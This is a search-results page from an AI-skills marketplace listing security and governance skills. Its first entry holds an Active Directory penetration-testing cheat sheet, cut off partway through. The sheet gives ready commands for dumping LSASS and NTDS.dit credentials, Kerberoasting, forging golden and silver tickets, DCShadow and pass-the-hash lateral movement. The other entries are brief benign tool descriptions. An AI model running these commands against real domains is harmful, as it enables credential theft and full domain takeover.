灵感菇

The natural ecosystem of AI skills: one sentence from you spreads into limitless connections.

Search results

All capabilities

Found 476 relevant results / Integration & Automation

Security & Governance / Review & Assessment

Active Directory Attacks

active-directory-attacks

300

Active Directory penetration testing technical guide

## Information Gathering

### Basic Domain Information

- `nltest /domain_trusts` - View domain trust relationships
- `net view /domain` - Enumerate the list of domains
- `nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>` - Locate domain controllers

### BloodHound Asset Discovery

```powershell
# SharpHound data collection
Invoke-BloodHound -CollectionMethod All -Domain target.com -ZipFileName loot.zip
```

### LDAP Queries

```powershell
# Find domain admin accounts
([adsisearcher]"(&(objectCategory=person)(objectClass=user)(adminCount=1))").FindAll()

# Find service accounts with unconstrained delegation
Get-ADObject -LDAPFilter "(&(userAccountControl:1.2.840.113556.1.4.803:=524288)(samAccountType=805306368))"
```

## Credential Acquisition

### LSASS Memory Extraction

```powershell
# procdump + mimikatz offline parsing
procdump.exe -accepteula -ma lsass.exe lsass.dmp
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
```

### SAM/NTDS.dit Extraction

```powershell
# Volume Shadow Copy method
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\loot\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\loot\

# ntdsutil, the official tool
ntdsutil "ac i ntds" "ifm" "create full c:\loot" q q
```

### Kerberoasting

```powershell
# Request a service ticket for an SPN
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sql01.target.com:1433"

# Automated with Rubeus
Rubeus.exe kerberoast /outfile:hashes.txt
```

## Kerberos Attacks

### AS-REP Roasting

```powershell
# Find accounts with "Do not require Kerberos preauthentication" set
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth

# Rubeus attack
Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
```

### Golden Ticket

```powershell
# Requires the NTLM hash of the krbtgt account
mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt
mimikatz # kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-... /krbtgt:hash /ptt
```

### Silver Ticket

```powershell
# Targets a specific service; requires the service account's NTLM hash
mimikatz # kerberos::golden /user:fakeuser /domain:target.com /sid:S-1-5-21-... /target:sql01.target.com /service:MSSQLSvc /rc4:servicehash /ptt
```

### DCShadow

```powershell
# Requires domain admin privileges; registers a rogue DC
mimikatz # lsadump::dcshadow /object:targetuser /attribute:Description /value:"backdoor"
```

## Lateral Movement

### Pass-the-Hash

```powershell
# mimikatz
sekurlsa::pth /user:admin /domain:target.com /ntlm:hash /run:powershell.exe

# Invoke-WMIExec
Invoke-WMIExec -Target dc01.target.com -Username admin -Hash hash -Command "powershell -enc ..."
```

### Over-Pass-the-Hash

```powershell
# Obtain a TGT, then use normal Kerberos authentication
Rubeus.exe asktgt /user:admin /rc4:hash /ptt
```

### Pass-the-Ticket

```powershell
# Export tickets, then inject
mimikatz # sekurlsa::tickets /export
mimikatz # kerberos::ptt [0;123456]-0-0-40810000-admin@krbtgt-target.com.kirbi
```

### Constrained Delegation Abuse

```powershell
# Configure S4U2Self + S4U2Proxy
Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:admin /msdsspn:cifs/target.target.com /ptt
```

### Resource-Based Constrained Delegation (RBCD

Stars 0
uiuxtestingsecurity

Security & Governance / Review & Assessment

ln-512-tech-debt-cleaner

ln-512-tech-debt-cleaner

299

Auto-fixes low-risk tech debt (unused imports, dead code, commented-out code) with >=90% confidence. Use when audit findings need safe automated cleanup.

Stars 465
audit512techdebt

Security & Governance / Review & Assessment

reddit-thread-analyzer

reddit-thread-analyzer

296

Analyze Reddit threads for sentiment, consensus opinions, top arguments, and discussion patterns. Use this when users want to understand Reddit community…

Stars 138
authredditthreadanalyzer

Security & Governance / Review & Assessment

jira

jira

296

Jira integration. Manage project management and ticketing data, records, and workflows. Use when the user wants to interact with Jira data.

Stars 35
authworkflowjiraintegration

Security & Governance / Review & Assessment

osint

osint

295

Structured OSINT investigations — people lookup, company intel, investment due diligence, entity/threat intel, domain recon, organization research using public…

Stars 13,807
uiworkflowosintstructured

Security & Governance / Review & Assessment

alicloud-ai-misc-crawl-and-skill-test

alicloud-ai-misc-crawl-and-skill-test

294

Minimal validation of the readiness of the crawl and skill workflows.

Stars 0
uiauthworkflowalicloud

Security & Governance / Review & Assessment

security-scanning-security-dependencies

security-scanning-security-dependencies

292

You are a security expert specializing in dependency vulnerability analysis, SBOM generation, and supply chain security. Scan project dependencies across…

Stars 37,704
testingsecurityauditdatabase

Security & Governance / Review & Assessment

notion

notion

284

Notion integration. Manage project management and document management data, records, and workflows. Use when the user wants to interact with Notion data.

Stars 35
authdatabaseworkflownotion

Security & Governance / Review & Assessment

find-bugs

find-bugs

281

Find bugs, security vulnerabilities, and code quality issues in local branch changes. Use when asked to review changes, find bugs, security review, or audit…

Stars 37,682
securityauditfindbugs

Security & Governance / Review & Assessment

security-compliance-compliance-check

security-compliance-compliance-check

273

You are a compliance expert specializing in regulatory requirements for software systems including GDPR, HIPAA, SOC2, PCI-DSS, and other industry standards.…

Stars 37,704
designuisecurityaudit

Security & Governance / Review & Assessment

Alibaba Cloud Security - Content Security - Content Moderation (Green Net)

alicloud-security-content-moderation-green

273

Manage Alibaba Cloud Content Security (Green) via OpenAPI/SDK. Use whenever the user needs content security resource and policy operations, including…

Stars 0
uisecurityapiworkflow

Security & Governance / Review & Assessment

Alibaba Cloud Database RDS Supabase

alicloud-database-rds-supabase

271

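Manage Alibaba Cloud RDS Supabase (RDS AI Service 2025-05-07) via OpenAPI. Used for creating instances, starting/stopping/restarting them, resetting passwords, and similar operations.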

Stars 0
uisecurityauthapi

Security & Governance / Review & Assessment

securing-s3-buckets

securing-s3-buckets

270

Stars 0
uisecurityauditapi

Security & Governance / Review & Assessment

Alibaba Cloud Data Lake DLF Next

alicloud-data-lake-dlf-next

262

Manage Alibaba Cloud Data Lake Formation (DlfNext) via OpenAPI/SDK. Use when the user needs DLF Next catalog/governance resource operations, including…

Stars 0
uiapiworkflowalicloud

Security & Governance / Review & Assessment

Alibaba Cloud Security - Cloud Firewall

alicloud-security-cloudfw

262

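Manage Alibaba Cloud Cloud Firewall (Cloudfw) via OpenAPI/SDK. Use when the user requests firewall policy/resource operations, change management, status queries, and the like.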

Stars 0
uisecurityapiworkflow

Security & Governance / Review & Assessment

dispatcher

dispatcher

261

Single entry point for all AEM as a Cloud Service Dispatcher skills. Covers config authoring, technical advisory, incident response, performance tuning, security hardening, and full lifecycle orchestration for the Adobe Dispatcher Apache HTTP Server module and its HTTPD/dispatcher configuration.

Stars 93
designperformancesecurityaudit

Security & Governance / Review & Assessment

connecting-to-data-source

connecting-to-data-source

261

Stars 0
uitestingsecurityaudit

Security & Governance / Review & Assessment

Alibaba Cloud Security ID Verification CloudAuth

alicloud-security-id-verification-cloudauth

261

Manage Alibaba Cloud ID Verification (Cloudauth) via OpenAPI/SDK. Use when the user performs ID verification resource operations, configuration…

Stars 0
uisecurityauthapi

Security & Governance / Review & Assessment

Alibaba Cloud Security Center SAS

alicloud-security-center-sas

260

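Manage Alibaba Cloud Security Center (Sas) via OpenAPI/SDK. Use when the user needs Security Center resource operations, configuration updates, status queries, and the like.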

Stars 0
uisecurityapiworkflow

Security & Governance / Review & Assessment

attack-tree-construction

attack-tree-construction

256

Build comprehensive attack trees to visualize threat paths. Use when mapping attack scenarios, identifying defense gaps, or communicating security risks to…

Stars 37,666
designuisecurityauth
